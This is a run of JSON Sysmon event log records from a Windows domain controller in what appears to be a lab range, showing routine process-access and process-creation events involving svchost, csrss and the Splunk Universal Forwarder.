{"EventTime":"2020-08-01 05:48:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3873,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:54.222\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:54.222","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3874,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:54.222\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:54.222","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3875,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:54.222\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:54.222","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3876,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:54.222\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0246-5F25-0000-001071D20500}\r\nTargetProcessId: 4272\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:54.222","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0246-5F25-0000-001071D20500}","TargetProcessId":"4272","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3877,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:54.378\r\nSourceProcessGUID: {A837DB8D-0246-5F25-0000-001071D20500}\r\nSourceProcessId: 4272\r\nSourceThreadId: 4264\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:54.378","SourceProcessGUID":"{A837DB8D-0246-5F25-0000-001071D20500}","SourceProcessId":"4272","SourceThreadId":"4264","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3878,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:54.895\r\nProcessGuid: {A837DB8D-0246-5F25-0000-0010A2D40500}\r\nProcessId: 4224\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nFileVersion: 8.0.2\r\nDescription: Monitor windows event logs\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winevtlog.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=A735F697C6C533F20D023E4318824194,SHA256=295236CFB06A5F9C1F76EECC468F9A070BFCB5C4E094918059EC86BBB654E119,IMPHASH=85F4904CF3562658E303E53274ABD436\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:54.895","ProcessGuid":"{A837DB8D-0246-5F25-0000-0010A2D40500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","FileVersion":"8.0.2","Description":"Monitor windows event logs","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winevtlog.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=A735F697C6C533F20D023E4318824194,SHA256=295236CFB06A5F9C1F76EECC468F9A070BFCB5C4E094918059EC86BBB654E119,IMPHASH=85F4904CF3562658E303E53274ABD436","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:48:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3879,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:54.894\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0246-5F25-0000-0010A2D40500}\r\nTargetProcessId: 4224\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:54.894","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0246-5F25-0000-0010A2D40500}","TargetProcessId":"4224","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3880,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:54.894\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0246-5F25-0000-0010A2D40500}\r\nTargetProcessId: 4224\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:54.894","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0246-5F25-0000-0010A2D40500}","TargetProcessId":"4224","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3881,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:54.894\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:54.894","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\